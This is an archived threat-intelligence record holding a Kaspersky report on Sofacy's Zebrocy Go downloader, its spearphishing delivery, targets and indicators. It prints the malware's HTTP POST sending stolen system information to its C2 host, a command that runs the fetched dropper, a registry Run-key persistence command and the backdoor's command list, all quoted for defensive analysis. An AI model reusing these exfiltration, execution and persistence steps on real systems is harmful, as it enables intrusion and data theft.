{
	"id": "bbda597d-a102-462c-8362-7bf01dea567f",
	"created_at": "2026-04-06T00:11:50.593106Z",
	"updated_at": "2026-04-10T03:37:50.045157Z",
	"deleted_at": null,
	"sha1_hash": "fb42bf16042b02809151ce77353f44140fca1e3f",
	"title": "A Zebrocy Go Downloader",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 117963,
	"plain_text": "A Zebrocy Go Downloader\r\nBy GReAT\r\nPublished: 2019-01-11 · Archived: 2026-04-05 17:14:02 UTC\r\nLast year at SAS2018 in Cancun, Mexico, “Masha and these Bears” included discussion of a subset of Sofacy\r\nactivity and malware that we call “Zebrocy”, and predictions for the decline of SPLM/XAgent Sofacy activity\r\ncoinciding with the acceleration of Zebrocy activity and innovation. Zebrocy was initially introduced as a Sofacy\r\nbackdoor package in 2015, but the Zebrocy cluster has carved a new approach to malware development and\r\ndelivery to the world of Sofacy. In line with this approach, we will present more on this Zebrocy innovation and\r\nactivity playing out at SAS 2019 in Singapore.\r\nOur colleagues at Palo Alto recently posted an analysis of Zebrocy malware. The analysis is good and marked\r\ntheir first detection of a Zebrocy Go variant as October 11, 2018. Because there is much to this cluster, clarifying\r\nand adding to the discussion is always productive.\r\nOur original “Zebrocy Innovates – Layered Spearphishing Attachments and Go Downloaders” June 2018 writeup\r\ndocuments the very same downloader, putting the initial deployment of Zebrocy Go downloader activity at May\r\n10, 2018. And while the targeting in the May event was most likely different from the October event, we\r\ndocumented this same Go downloader and same C2 was used to target a Kyrgyzstan organization. Also interesting\r\nis that the exact same system was a previous Zebrocy target earlier in 2018. So, knowing that this same activity is\r\nbeing reported on as “new” six months later tells us a bit about the willingness of this group to re-use rare\r\ncomponents and infrastructure across different targets.\r\nWhile they are innovating with additional languages, as we predicted in early 2018, their infrastructure and\r\nindividual components may have more longevity than predicted. 
Additionally, at the beginning of 2018, we\r\npredicted the volume of Zebrocy activity and innovation will continue to increase, while the more traditional\r\nSPLM/XAgent activity will continue to decline. Reporting on SPLM/XAgent certainly has followed this course in\r\n2018 as SPLM/XAgent detections wind down globally, as has Sofacy’s use of this malware from our perspective.\r\nMuch of the content below is reprinted from our June document.\r\nThe Sofacy subset we identify as “Zebrocy” continues to target Central Asian government related organizations,\r\nboth in-country and remote locations, along with a new middle eastern diplomatic target. And, as predicted, they\r\ncontinue to build out their malware set with a variety of scripts and managed code. In this case, we see new\r\nspearphishing components – an LNK file maintaining powershell scripts and a Go-implemented system\r\ninformation collector/downloader. This is the first time we have observed a well-known APT deploy malware with\r\nthis compiled, open source language “Go”. There is much continued recent Zebrocy activity using their previously\r\nknown malware set as well.\r\nStarting in May 2018, Zebrocy spearphished Central Asian government related targets directly with this new Go\r\ndownloader. For example, the attachment name included one “30-144.arj” compressed archive, an older archiver\r\ntype handled by 7zip, Rar/WinRAR, and others. Users found “30-144.exe” inside the archive with an altered file\r\nhttps://securelist.com/a-zebrocy-go-downloader/89419/\r\nPage 1 of 7\n\nicon made to look like the file was a Word document (regardless of the .exe file extension). 
And in a similar\r\nfashion in early June, Zebrocy spearphished over a half-dozen accounts targeting several Central Asian countries’\r\ndiplomatic organizations with a similar scheme “2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx”, sending out a more common Zebrocy Delphi downloader.\r\nIn other cases, delivery of the new Go downloader was not straightforward. The new Go downloader also was\r\ndelivered with a new spearphishing object that rolls up multiple layers of LNK file, powershell scripts, base64\r\nencoded content, .docx files and the Go downloader files. The downloader is an unusually large executable at over\r\n1.5mb, written to disk and launched by a powershell script. So the attachment that arrived over email was large.\r\nThe powershell script reads the file’s contents from a very large LNK file that was included as an email\r\nattachment, and then writes it to disk along with a Word document of the same name. So, launching the\r\ndownloader is followed with the opening of an identically named decoy word document with “WINWORD.EXE”\r\n/n “***\\30-276(pril).docx” /o”. The downloader collects a large amount of system information and POSTs it to a\r\nknown Zebrocy C2, then pulls down known Zebrocy Delphi payload code, launches it, and deletes itself.\r\nWe observed previous, somewhat similar spearphishing scenarios with an archive containing .LNK, .docx, and\r\nbase64 encoded executable code, delivering offensive Finfisher objects in separate intrusion activity clusters. This\r\nactivity was not Sofacy, but the spearphishing techniques were somewhat similar – the layered powershell script\r\nattachment technique is not the same, but not altogether new.\r\nAnd, it is important to reiterate that these Central Asian government and diplomatic targets are often geolocated\r\nremotely. In the list of target geolocations, notice countries like South Korea, the Netherlands, etc. 
In addition to\r\nZebrocy Go downloader data, this report provides data on various other observed Zebrocy malware and targets\r\nover the past three months.\r\nSpreading\r\nAlmost all observed Zebrocy activity involves spearphishing. Spearphish attachments arrive with .rar or .arj\r\nextensions. Filename themes include official government correspondence invitations, embassy notes, and other\r\nrelevant items of interest to diplomatic and government staff. Enclosed objects may be LNK, docx, or exe files.\r\nA decoy PDF that directly targeted a Central Asian nation is included in one of the .arj attachments alongside the\r\nGo downloader. The content is titled “Possible joint projects in cooperation with the International Academy of\r\nSciences” and lists multiple potential projects requiring international cooperation with Tajikistan and other\r\ncountries. This document appears to be a legitimate one that was stolen, created mid-May 2018. While we cannot\r\nreprint potentially leaked information publicly, the document was clearly intended for a Russian-language reader.\r\nPowershell launcher from within LNK\r\nThe LNK containing two layers of powershell script and base64 encoded content is an unusual implementation –\r\ncontents from a couple are listed in the technical appendix. When opened, the script opens the shortcut file it is\r\ndelivered within (“30-276(pril).docx.lnk”), pulls out the base64 encoded contents (in one case, from byte 3507 to\r\nbyte 6708744), base64-decodes that content, and then decodes a second layer using the same powershell scheme. 
This script writes\r\ntwo files to disk as “30-276(pril).exe” and “30-276(pril).docx” and opens both files, leading to the launch of the\r\nGo language system information collector/downloader and a decoy Word document.\r\nGo System Information Collector/Downloader\r\nMd5: 333d2b9e99b36fb42f9e79a2833fad9c\r\nSha256: fcf03bf5ef4babce577dd13483391344e957fd2c855624c9f0573880b8cba62e\r\nSize: 1.79 MB (UPX packed; 3.5 MB UPX unpacked)\r\nCompiledOn: Stomped (Wed Dec 31 17:00:00 1969)\r\nType: PE 32-bit Go executable\r\nName: 30-276(pril).exe\r\nThis new Go component not only downloads and executes another Zebrocy component, but it also enumerates and\r\ncollects a fair amount of system data for upload to its C2 before downloading and executing any further\r\nmodules. It collects data with the systeminfo utility and additionally makes a variety of WMI calls.\r\nAfter collecting system information, the backdoor POSTs to its hardcoded C2, in this case a hardcoded\r\nIP/URL. 
Note that the backdoor simply uses the default Go user-agent:\r\n“POST /technet-support/library/online-service-description.php?id_name=345XXXD5 HTTP/1.1\r\nHost: 89.37.226.148\r\nUser-Agent: Go-http-client/1.1”\r\nWith this POST, the module uploads all of the system information it just gathered with the exhaustive systeminfo\r\nutility over http: hostname, date/time, all hardware, hotfix, service and software information.\r\nThe module then retrieves the gzip’d, better known Zebrocy dropper over port 80 as part of an encoded jpg file,\r\nwrites it to disk, and executes it from a command line:\r\n“cmd /C c:\\users\\XXX\\appdata\\local\\Identities\\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\\w32srv.exe”\r\nand adds a run key persistence entry with the system utility reg.exe:\r\ncmd /C “reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v Driveupd /d\r\nc:\\users\\XXX\\appdata\\local\\Identities\\{83AXXXXX-986F-1673-091A-02XXXXXXXXXX}\\w32srv.exe /f”\r\nZebrocy AutoIT Dropper\r\nMd5: 3c58ed6913593671666283cb7315dec3\r\nSha256: 96c3700ad639faa85982047e05fbd71c3dfd502b09f9860685498124e7dbaa46\r\nSize: 478.5 KB (UPX packed)\r\nCompiled: Fri Apr 27 06:40:32 2018\r\nType: PE32 AutoIT executable\r\nPath, Name: appdata\\Identities\\{83AF1378-986F-1673-091A-02681FA62C3B}\\w32srv.exe\r\nThis AutoIT dropper writes out a Delphi payload, consistent with previous behavior going back to November\r\n2015, initially described in our January 2016 report “Zebrocy – Sofacy APT Deploys New Delphi Payload”.\r\nZebrocy Delphi Payload\r\nMd5: 2f83acae57f040ac486eca5890649381\r\nSha256: f9e96b2a453ff8922b1e858ca2d74156cb7ba5e04b3e936b77254619e6afa4e8\r\nSize: 786 KB\r\nCompiled: Fri Jun 19 16:22:17 1992 (stomped/altered)\r\nType: PE32 exe [v4.7.7]\r\nPath, Name: 
c:\\ProgramData\\Protection\\Active\\armpro.exe\r\nInterestingly, the final payload reverts to an earlier version [v4.7.7]. A “TURBO” command is missing from\r\nthis Zebrocy Delphi backdoor command list.\r\nSYS_INFO\r\nSCAN_ALL\r\nSCAN_LIST\r\nDOWNLOAD_DAY\r\nDOWNLOAD_LIST\r\nCREATE_FOLDER\r\nUPLOAD_FILE\r\nFILE_EXECUTE\r\nDELETE_FILES\r\nREG_WRITE_VALUE\r\nREG_READ_VALUE\r\nREG_DELETE_VALUE\r\nREG_GET_KEYS_VALUES\r\nREG_DELETE_KEY\r\nKILL_PROCESS\r\nCONFIG\r\nGET_NETWORK\r\nCMD_EXECUTE\r\nDOWNLOAD_DATE\r\nDELETE_FOLDER\r\nUPLOAD_AND_EXECUTE_FILE\r\nSCREENSHOTS\r\nFILE_EXECUTE\r\nSET_HIDDEN_ATTR\r\nSTART\r\nSTOP\r\nKILL_MYSELF\r\nInfrastructure\r\nZebrocy backdoors are configured to communicate directly with IP-assigned web server hosts over port 80, and\r\napparently the group favors Debian Linux for this part of its infrastructure: Apache 2.4.10 running on Debian Linux.\r\nA somewhat sloppy approach continues, and the group set up and configured one of the sites with digital\r\ncertificates using a typical Sofacy-sounding domain that they have not yet registered: “weekpost.org”. Digital\r\ncertificate details are provided in the appendix.\r\nThese “fast setup” VPS servers run in “qhoster[.]com” can be paid for with Webmoney, Bitcoin, Litecoin, Dash,\r\nAlfa Click, Qiwi, transfers from Sberbank Rossii, Svyaznoy, Promsvyazbank, and more. Although, it appears that\r\nBitcoin and Dash may be of the most interest to help ensure anonymous transactions. Dataclub provides similar\r\npayment methods:\r\nOne of the VPS IP addresses (80.255.12[.]252) is hosted in the “afterburst[.]com”/Oxygem range. This service is\r\nthe odd one out and is unusual because it only supports VISA/major credit cards and Paypal at checkout. 
If other\r\npayment options are provided, they are not a part of the public interface.\r\nVictims and Targeting\r\nZebrocy Go downloader 2018 targets continue to be Central Asian government foreign policy and administrative\r\nrelated. Some of these organizations are geolocated in-country, or locally, and some are located remotely. In\r\nseveral cases, these same systems have seen multiple artefacts from Zebrocy over the course of 2017 and early\r\n2018:\r\n• Kazakhstan\r\n• Kyrgyzstan\r\n• Azerbaijan\r\n• Tajikistan\r\nAdditional recent Zebrocy target geo-locations (targeting various Central Asian/ex-USSR local and remote\r\ngovernment locations):\r\n• Qatar\r\n• Ukraine\r\n• Czech Republic\r\n• Mongolia\r\n• Jordan\r\n• Germany\r\n• Belgium\r\n• Iran\r\n• Turkey\r\n• Armenia\r\n• Afghanistan\r\n• South Korea\r\n• Turkmenistan\r\n• Kazakhstan\r\n• Netherlands\r\n• Kuwait\r\n• United Arab Emirates\r\n• Spain\r\n• Poland\r\n• Qatar\r\n• Oman\r\n• Switzerland\r\n• Mongolia\r\n• Kyrgyzstan\r\n• United Kingdom\r\nAttribution\r\nZebrocy activity is a known subset of Sofacy activity. We predicted that they would continue to innovate within\r\ntheir malware development after observing past behavior, developing with Delphi, AutoIT, .Net C#, Powershell,\r\nand now “Go” languages. Their continued targeting, phishing techniques, infrastructure setup, technique and\r\nmalware innovation, and previously known backdoors help provide strong confidence that this activity continues\r\nto be Zebrocy.\r\nConclusions\r\nZebrocy continues to maintain a higher level of volume attacking local and remote ex-USSR republic Central\r\nAsian targets than other clusters of targeted Sofacy activity. Also interesting with this Sofacy sub-group is the\r\ninnovation that we continue to see within their malware development. 
Much of the spearphishing remains\r\nthematically the same, but the remote locations of these Central Asian targets are becoming more spread out –\r\nSouth Korea, Netherlands, etc. While their focus has been on Windows users, it seems that we can expect the\r\ngroup to continue making more innovations within their malware set. Perhaps all their components will soon\r\nsupport all OS platforms that their targets may be using, including Linux and MacOS. Zebrocy spearphishing\r\ncontinues to be characteristically higher volume for a targeted attacker, and most likely that trend will continue.\r\nAnd, as their spearphishing techniques progress to rival Finfisher techniques without requiring zero-day\r\nexploitation, perhaps Zebrocy will expand their duplication of more sources of open source spearphishing\r\ntechniques.\r\nIoC\r\nGo downloader\r\n333d2b9e99b36fb42f9e79a2833fad9c\r\nIPs\r\n80.255.12.252\r\n89.37.226.148\r\n46.183.218.34\r\n185.77.131.110\r\n92.114.92.128\r\nURLs\r\n/technet-support/library/online-service-description.php?id_name=XXXXX\r\n/software-apptication/help-support-apl/getidpolapl.php\r\nFile – paths and names\r\n30-276(pril).exe\r\n30-144-(copy).exe\r\nEmbassy Note No.259.docx.lnk\r\n2018-05-Invitation-Letter(1).rar//2018-05-Invitation-Letter(pril).docx\r\nSource: https://securelist.com/a-zebrocy-go-downloader/89419/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://securelist.com/a-zebrocy-go-downloader/89419/"
	],
	"report_names": [
		"89419"
	],
	"threat_actors": [
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434310,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.pdf",
		"text": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.txt",
		"img": "https://archive.orkl.eu/fb42bf16042b02809151ce77353f44140fca1e3f.jpg"
	}
}